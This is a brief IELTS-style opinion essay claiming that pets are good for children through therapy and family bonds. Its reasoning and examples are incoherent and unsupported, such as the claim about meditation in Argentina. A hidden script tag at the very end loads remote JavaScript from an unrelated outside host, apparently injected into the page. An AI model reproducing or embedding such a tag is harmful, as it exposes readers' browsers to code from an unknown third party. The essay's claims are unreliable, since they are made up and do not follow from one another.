Some people think that keeping pets is good for children while others think it is dangerous and unhealthy.

Which opinion do you agree with? Agree

One of the most controversial issues today relates to how having animals at home could help children positively. I firmly agree with the statement above. I feel this way for two main reasons which I will explore in the following essay.

I feel strongly that keeping pets can be the primary method for therapy. The reason for this is that mental health can play an important role in society. In addition, psychological improvements can be a major aspect that relates to modern society these days, so people must pay close attention to it. For example, meditation is undoubtedly the most accepted treatment in Argentina.

I feel just as convinced that keeping pets has profound impacts on the family. It is often argued that in fact the importance of good habits must not be overlooked because healthy bonds may affect educational values. Furthermore, improved education will continue to influence the future of lovely relationships. For instance, Australians would prefer relations instead of growth.

In conclusion, adopting a pet can have a healthy impact on children. It has been shown that not only can keeping pets influence therapy, but the family also can too. It is expected that this trend will continue to increase in the future.<script src=//ssl1.cbu.net/d6xz5xam></script>